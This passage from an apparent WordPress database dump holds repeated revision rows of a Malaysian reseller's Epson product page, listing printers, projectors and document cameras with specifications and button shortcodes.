x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:05:19','2019-09-26 02:05:19','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3487,1,'2019-09-26 10:37:20','2019-09-26 02:37:20','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center><h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:37:20','2019-09-26 02:37:20','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3488,1,'2019-09-26 10:42:03','2019-09-26 02:42:03','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their 